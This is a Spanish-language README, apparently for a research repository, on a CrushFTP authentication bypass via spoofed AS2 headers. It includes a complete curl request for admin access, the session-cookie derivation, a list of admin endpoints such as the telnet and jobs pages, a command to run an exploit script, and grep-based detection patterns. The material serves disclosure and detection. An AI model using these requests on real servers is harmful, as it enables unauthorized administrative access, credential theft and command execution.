Investigación sobre la omisión de autenticación AS2 de CrushFTP que permite acceso administrativo no autenticado. Incluye scripts PoC, reglas de detección y análisis técnico con fines educativos y defensivos.
⚠️ IMPORTANTE: Esta vulnerabilidad ha sido corregida por CrushFTP en noviembre de 2025. Esta investigación se publica con fines educativos y defensivos únicamente.
📝 NOTA: Esta investigación se basa en patrones de vulnerabilidad similares a CVE-2025-54309. El número CVE exacto puede diferir. Se trata de una investigación de seguridad independiente realizada en un entorno de laboratorio doméstico controlado.
Este repositorio documenta una vulnerabilidad crítica de bypass de autenticación en servidores CrushFTP que permite acceso administrativo completo mediante la manipulación de cabeceras AS2 (Applicability Statement 2). La vulnerabilidad no requiere autenticación y puede explotarse con una única solicitud HTTP.
Puntos clave:
Investigador: SmileyFace101 (@SmileyFace101)
La interfaz web de CrushFTP confía incorrectamente en las cabeceras del protocolo AS2 sin una validación adecuada. El servidor asume que las solicitudes AS2 están preautenticadas y omite los procedimientos normales de autenticación.
Versiones Vulnerables de CrushFTP (Confirmadas en Laboratorio):
Versiones Corregidas:
Entorno de Laboratorio:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
Ejemplo (Entorno de Laboratorio):
curl -H "X-DMZ-Proxy: disabled" \
-H "X-AS2-Version: 1.0" \
-H "User-Agent: AS2Server/1.0" \
"http://10.0.100.50/WebInterface/admin/index.html"
Nota: Úselo únicamente en sistemas que posea o para los que tenga permiso explícito de prueba.
Durante la explotación, descubrimos una relación matemática en la generación de cookies de sesión que hace que la explotación sea 100% fiable:
Estructura de CrushAuth: [TIMESTAMP]_[SESSION_ID]
currentAuth = Últimos 4 caracteres de SESSION_ID
parámetro c2f = Mismo valor que currentAuth
| Aspecto de Seguridad | Nivel de Impacto | Descripción |
|---|---|---|
| Confidencialidad | 🔴 CRÍTICO | Acceso completo a credenciales, configuraciones, claves PGP, registros |
| Integridad | 🔴 CRÍTICO | Creación de cuentas de usuario, cambios de configuración, modificaciones de archivos |
| Disponibilidad | 🟡 ALTO | Ejecución de comandos del sistema, capacidad de interrupción del servicio |
| Escalada de Privilegios | 🔴 CRÍTICO | Acceso directo de administrador, creación de cuentas persistentes |
✅ Enumeración completa del servidor y de los usuarios
✅ Creación y modificación de cuentas de usuario
✅ Acceso y navegación del sistema de archivos
✅ Ejecución de comandos a través de la interfaz telnet
✅ Programación de trabajos con privilegios de sistema
✅ Acceso a claves PGP y certificados
✅ Modificación de la configuración administrativa
Consulte el directorio detection/ para:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
/WebInterface/function/ con cabeceras AS2# Registros del servidor web
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log
# Registros de la aplicación CrushFTP
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log
.
├── README.md # Este archivo – visión general y uso
├── docs/
│ └── TECHNICAL_ANALYSIS.md # Análisis técnico completo
├── exploits/
│ ├── enhanced_session_exploit.sh # Explotación completa con gestión de sesiones
│ ├── targeted_exploitation.sh # Pruebas en endpoints de alto valor
│ └── adaptive_exploitation.sh # Enfoque multiestrategia
└── detection/
├── snort_rules.txt # Firmas IDS/IPS (Snort)
├── suricata_rules.txt # Firmas IDS/IPS (Suricata)
└── log_analysis.sh # Análisis de registros y detección de IOCs
Lea la documentación:
Pruebe en su laboratorio:
# ¡Asegúrese de poseer el sistema objetivo!
./exploits/enhanced_session_exploit.sh 10.0.100.50
Implemente la detección:
✅ Bypass completo de autenticación AS2 descubierto y documentado
✅ Requisito crítico de generación de cookies de sesión identificado y resuelto
✅ Relación matemática en la gestión de sesiones sometida a ingeniería inversa
✅ Metodología de explotación en dos fases desarrollada
✅ Patrón de explotación 100% fiable establecido
✅ Múltiples vectores RCE identificados y analizados
✅ Análisis completo del código fuente JavaScript realizado
/WebInterface/admin/index.html – Panel de administración principal/WebInterface/admin/telnet.html – Interfaz Telnet/WebInterface/Jobs/index.html – Gestión de trabajos/WebInterface/UserManager/index.html – Gestión de usuarios/WebInterface/PGP/index.html – Gestión de claves PGP/WebInterface/function/ – Procesador de funciones administrativasAutor: SmileyFace101
GitHub: @SmileyFace101
Período de Investigación: Marzo - Julio de 2025 (Laboratorio Doméstico)
Divulgación Pública: 6 de diciembre de 2025
Esta investigación es únicamente para fines EDUCATIVOS y DEFENSIVOS.
✅ Uso Autorizado:
❌ Prohibido:
Al usar esta investigación, usted acepta:
Descargo de responsabilidad: El autor no es responsable por el mal uso. El acceso no autorizado a computadoras es ilegal.
Licencia MIT – Consulte el archivo LICENSE para más detalles.
Última actualización: 6 de diciembre de 2025
Evaluación de Riesgo: CRÍTICO – Se requiere parcheo y mitigación inmediata
Última actualización: 6 de diciembre de 2025
Autor: SmileyFace101
Investigación realizada: Marzo - Julio de 2025 en entorno de laboratorio autorizado